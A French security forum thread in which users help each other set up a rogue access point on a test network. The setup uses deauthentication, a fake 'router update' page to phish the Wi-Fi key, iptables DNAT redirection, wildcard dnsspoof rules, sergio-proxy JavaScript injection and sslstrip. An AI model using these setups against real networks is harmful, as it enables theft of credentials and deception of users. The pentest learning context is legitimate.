Annonce

Réduire
Aucune annonce.

Pentest wifi grâce a un rogue-ap

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Pentest wifi grâce a un rogue-ap

    Bonjour je suis en train de travailler la mise en place de rogue ap pour récupérer la clé wifi d'un réseau test.
    L'idée étant de mettre en place un réseau parallèle portant le même nom que le réseau d'origine.
    Puis de saturer le réseau d'origine afin de déconnecter la cible de ce dernier.
    Cette dernière ce voyant alors contrainte de ce reconnecter manuellement sur notre réseaux cible (puisque le réseaux d'origine est inaccessible).
    Et la on lui sert une jolie page : "mise a jour de votre box veuillez insérer votre clé wifi pour accéder à internet"
    Avec wireshark ou un peu de SQL on pourrait alors récupérer les identifiants sans trop d'encombre.

    Enfin en théorie...

    Les outils utilisé : kali linux 2016, udhcpd, airbase-ng, apache2, dnsspoof.

    Bon j'ai réussi à :

    -Créer un réseau avec accès à internet.
    -paramétrer tant bien que mal mon serveur udhcp et donner une adresse ip à ma cible.
    -faire fonctionner presque correctement apache2
    -faire un dnsspoof presque efficace

    Mon soucis c'est que quand la cible ce connecte à ma rogue elle n'est pas toujours rediriger vers ma page de test apache2 contenu dans le dossier var/www/

    J'ai essayer de mettre la régle iptable suivant qui pourtant devrait rediriger l'ensemble du trafic vers ma page de teste mais rien n'y fait.

    Code:
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.2.1
    Je pense alors au DNS et a la configuration de mon dnsspoof

    Code:
    dnsspoof -i at0 -f /root/dns.txt
    Mon fichier dns.txt contient les éléments suivant :

    Code:
    192.168.2.1 A *.fr
    192.168.2.1 A *.com
    192.168.2.1 A *.net
    192.168.2.1 A *.org
    www.* A 192.168.2.1
    http//.* A 192.168.2.1
    https//.* A 192.168.2.1
    Malheureusement pour l'ensemble des fichiers en https cela ne marche pas...
    ma question est la suivantes :
    Comment faire pour forcer l'ensemble du trafic à ce rediriger vers ma fakepage ??
    C'est forcément possible car avec les réseaux ouvert du style free wifi on à une page de connexion qui reste la même peu importe l'url taper donc la pas de problème de DNS ??

    Voilà c'est un question plutôt spécifique, j’espère que quelqu’un passant par la pourras m'aider à trouver un semblant de réponse.

    Mon objectif étant après ça de développer un petit tool en python pour automatiser l'ensemble du processus.












  • #2
    avec iptables, la redirection avec le port et le service adéquate... ( exemple: sergio-proxy)

    ou autre (https://www.blackarch.org/proxy.html)

    Pour la redirection vers ta "fakepage" avec sergio-proxy c'est plus simple

    exemple d'utilisation:

    Code:
    python sergio-proxy.py -l 10000 -w /tmp/sergio-log.txt --inject --js-url http://192.168.2.1/test.js --rate-limite 10 --per-domain


    /var/www/test.js (redirection) :

    Code:
    window.location.replace("http://tonsitefake.fr");
    https = sslstrip... (création fausse page - redirection https vers la fausse page...)


    c'est toi et ton imagination


    @+


    Commentaire


    • #3
      ok je vais essayer avec sergio-proxy pour le http. Mais pour le https avec sslstrip le probléme c'est que le hsts rique de poser pas mal de probléme pour le chargement des sites les plus connus et les plus utilisés.

      Est t'il possible dutiliser sergio-proxy et sslstrip en même temps. Je les connais pas trés bien c'est deux la ?

      Commentaire


      • #4
        Salut, tu trouveras certainement toutes les infos dont tu as besoin dans cette série d'articles : https://antaresnotebook.wordpress.co...t-transparent/

        Commentaire


        • #5
          Salut,merci de ta réponse flm, malheureusement j'ai écumé ce tutoriel de long en large et il ne répond pas à la problématique de redirection des requêtes Https vers ma fakepage.
          Toujours le même problème avec les navigateur récent, Problème de certificat.
          La solution semblerai de peut être mettre en place un portail captif.

          Sinon j'ai décortiqué le code en bash de linset, mais je me suis pas trop attardé dessus, je trouve qu"il ne fonctionne pas trop.
          J'essaye de comprendre le code de wifiphisher qui donne des résultat plutôt correcte. le python c'est pas encore mon fort

          ps : apparemment même dans le cas d'un portail captif il faut enregistrer un faux certificats, quelqu'un à vérifier ça ? c'est possible ?


          Commentaire


          • #6
            Salut

            C'est vraiment une bonne initiative de faire les tests.
            Je suis encore nul mais je vais quand même essayer de proposer une idée.


            PmGits29, tu n'as pas besoin des outils tels que
            - dnsspoof (car il est généralement utilisé pour empoisonner les résolutions DNS d'un domaine qui ne t'appartient pas, hors la cible est déjà dans ton faux réseau que tu as créé et dont tu es le maître)
            - udhcp (tu compliques)
            - pas besoin de rédirection avec iptables

            Esquisse de solution
            tu as déjà créé ton faux point d'accès et partant ton faux réseau dont tu es le maitre.
            - Tu configurer juste un simple serveur dhcp ordinaire (en installant le paquet isc-dhcp-server) et tu ajoutes dans la configuration de ce serveur les options de DNS qui sera celui d'un serveur DNS que tu configuras. Comme ça lorsque les clients vont se connecter sur ton faux points d'accès, ils auront comme adresse DNS l'adresse de ton serveur DNS que tu as configuré.
            - Tu configures un serveur dns (en installant le paquet bind9)
            - Tu configures dans une machine virtuelle (virtualbox ou vmware) un portail captif avec l'un des programmes de ton choix : Mikrotik, pfsense ou zeroshell. Pour l'un des programmes gérant ce portail, l'interface de ton LAN sera l'interface du réseau local où les clients se connectent (un pont vers ta carte wlan0) et l'interface de ton wan (Internet) sera celle connectée à ta Box (un pont vers ta carte LAN). Donc en supposant que ta machine a deux cartes réseaux : sans fil et filaire. Tu personnalises la page du portail captif selon ce que tu as préconisé. Surtout n'active pas le https sur le portail. Ensuite tu utilises wireshark pour récupérer les paramètres entrés car le protocole par défaut du portail au niveau de la couche application est http : ce qui est facile à récupérer avec wireshark.

            Bon c'était juste une idée.


            MERCI
            Passionné par la Sécurité Informatique.
            Le véritable ennemi de la connaissance n'est pas l'ignorance mais l'illusion de la connaissance.
            La quête de la connaissance passe d'abord par l'humilité et ensuite la détermination.

            Commentaire


            • #7
              Salut je te répond un peu tard mais j'ai pas trop eu le temps
              En tout cas merci d'avoir passé un peu de temps à réfléchir sur le problème.
              Il est vrai que la solution du portail captif semble intéressante mais j'ai réussis à faire fonctionner ma Rogue Ap avec les outils suivants :

              Airbase-ng
              Apache2
              UDHCPD
              IPTABLES

              Comme la précisé "flm" quelque post plus haut le tuto de antares est très bien documenté.
              A force d'essai je suis arrivé à quelque chose de correcte en reconfigurant apache2 et en apprenant à manipuler correctement iptable.
              Donc effectivement pas besoins de dnspoof bien que sous certaine version de windows grâce à dnspoof et ettercap une page s'ouvre automatique avec le fakepage dans le navigateur et ça c'est jolie

              La commande suivante permet effectivement de rediriger tout le trafic du port 80 vers la fakepage redirigé par apache2
              Un petit coup de wireshark and enjoy

              Bon le hic maintenant c'est le https. mais bon en travaillant sur les certificats il doit y avoir plein de possibilité.




              Commentaire

              Chargement...
              X